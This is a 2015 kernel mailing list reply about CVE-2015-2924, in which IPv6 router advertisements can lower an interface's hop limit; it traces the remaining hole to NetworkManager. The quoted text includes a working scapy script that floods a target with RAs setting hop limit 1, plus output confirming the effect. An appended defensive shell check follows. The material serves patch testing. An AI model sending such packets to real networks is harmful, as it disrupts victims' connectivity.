Date:	Wed, 29 Apr 2015 11:50:35 -0500
From:	Dan Williams <dcbw@...hat.com>
To:	"D.S. Ljungmark" <ljungmark@...io.se>
Cc:	Denys Vlasenko <vda.linux@...glemail.com>,
	David Miller <davem@...emloft.net>,
	Linus Torvalds <torvalds@...ux-foundation.org>,
	Andrew Morton <akpm@...ux-foundation.org>,
	netdev@...r.kernel.org,
	Linux Kernel Mailing List <linux-kernel@...r.kernel.org>,
	Hannes Frederic Sowa <hannes@...essinduktion.org>,
	Don Howard <dhoward@...hat.com>
Subject: Re: [GIT] Networking

On Wed, 2015-04-29 at 17:17 +0200, D.S. Ljungmark wrote:
> On 29/04/15 16:51, Denys Vlasenko wrote:
> > On Wed, Apr 1, 2015 at 9:48 PM, David Miller <davem@...emloft.net> wrote:
> >> D.S. Ljungmark (1):
> >>       ipv6: Don't reduce hop limit for an interface
> > 
> > https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=6fd99094de2b83d1d4c8457f2c83483b2828e75a
> > 
> > I was testing this change and apparently it doesn't close the hole.
> > 
> > The python script I use to send RAs:
> > 
> > #!/usr/bin/env python
> > import sys
> > import time
> > import scapy.all
> > from scapy.layers.inet6 import *
> > ip = IPv6()
> > # ip.dst = 'ff02::1'
> > ip.dst = sys.argv[1]
> > icmp = ICMPv6ND_RA()
> > icmp.chlim = 1
> > for x in range(10):
> >     send(ip/icmp)
> >     time.sleep(1)
> > 
> > # ./ipv6-hop-limit.py fe80::21e:37ff:fed0:5006
> > .
> > Sent 1 packets.
> > ...<10 times>...
> > Sent 1 packets.
> > 
> > After I do this, on the targeted machine I check hop_limits:
> > 
> > # for f in /proc/sys/net/ipv6/conf/*/hop_limit; do echo -n $f:; cat $f; done
> > /proc/sys/net/ipv6/conf/all/hop_limit:64
> > /proc/sys/net/ipv6/conf/default/hop_limit:64
> > /proc/sys/net/ipv6/conf/enp0s25/hop_limit:1  <=== THIS
> > /proc/sys/net/ipv6/conf/lo/hop_limit:64
> > /proc/sys/net/ipv6/conf/wlp3s0/hop_limit:64
> > 
> > As you see, the interface which received RAs still lowered
> > its hop_limit to 1. I take it means that the bug is still present
> > (right? I'm not a network guy...).
> 
> It might not be present in the _kernel_. Do you run NetworkManager on
> your system? If so, see below.
> 
> > 
> > I triple-checked that I do run the kernel with the fix.
> > Further investigation shows that the code touched by the fix
> > is not even reached, hop_limit is changed elsewhere.
> > 
> > I'm willing to test additional patches.
> 
> NetworkManager had its own re-implementation of the bug. It got fixed
> with NetworkManager commit:
> 
> commit bdaaf9849b0cacf131b71fa2ae168f5db796874f
> Author: Thomas Haller <thaller@...hat.com>
> Date:   Wed Apr 8 15:54:30 2015 +0200
> 
>     platform: don't accept lowering IPv6 hop-limit from RA (CVE-2015-2924)
> 
> 
> 
> Before that commit, NetworkManager would take the RA packet, extract
> the hop limit, and write it to the sysctl itself.

Yup, we basically followed the original kernel logic here, so we needed
to patch it in NM as well.  It's been backported to NM 0.9.10, 1.0, and
obviously is in git master.

Dan
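
Added example (not part of the thread, and not kernel or NetworkManager code): a scripted form of the hop_limit check quoted above, reporting every interface whose value is below the "default" entry. The function names, the optional floor argument and the sample tree are assumptions made for illustration; the sample values are constructed from the output shown in the thread.

```shell
#!/bin/sh
# Report interfaces whose IPv6 hop_limit is lower than a baseline.
# A low value does not say who wrote it (kernel RA handling, NetworkManager
# or an administrator); it only marks the interface for a closer look.

# lowered_hop_limits [CONF_ROOT] [FLOOR]
#   CONF_ROOT  sysctl directory, default /proc/sys/net/ipv6/conf
#   FLOOR      baseline; defaults to the value of CONF_ROOT/default/hop_limit
# Prints "iface value floor" per finding. Returns 2 if no baseline is usable.
lowered_hop_limits() {
    root=${1:-/proc/sys/net/ipv6/conf}
    floor=${2:-}
    if [ -z "$floor" ]; then
        floor=$(cat "$root/default/hop_limit" 2>/dev/null) || floor=""
    fi
    case $floor in
        ''|*[!0-9]*) echo "no numeric baseline under $root" >&2; return 2 ;;
    esac
    for f in "$root"/*/hop_limit; do
        [ -r "$f" ] || continue
        iface=$(basename "$(dirname "$f")")
        # "all" and "default" are templates, not real interfaces
        case $iface in all|default) continue ;; esac
        val=$(cat "$f")
        case $val in ''|*[!0-9]*) continue ;; esac   # skip unreadable values
        if [ "$val" -lt "$floor" ]; then
            printf '%s %s %s\n' "$iface" "$val" "$floor"
        fi
    done
    return 0
}

# Constructed sample tree mirroring the /proc listing quoted in the thread,
# so the check can be exercised without touching a live system.
make_sample_tree() {
    t=$(mktemp -d) || return 1
    for pair in all:64 default:64 enp0s25:1 lo:64 wlp3s0:64; do
        mkdir -p "$t/${pair%%:*}"
        echo "${pair##*:}" > "$t/${pair%%:*}/hop_limit"
    done
    echo "$t"
}

# Stand-alone run against the constructed tree; prints "enp0s25 1 64".
sample=$(make_sample_tree) && lowered_hop_limits "$sample"
rm -rf "$sample"
```

Called with no arguments, lowered_hop_limits reads the live /proc/sys/net/ipv6/conf tree instead of the sample.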
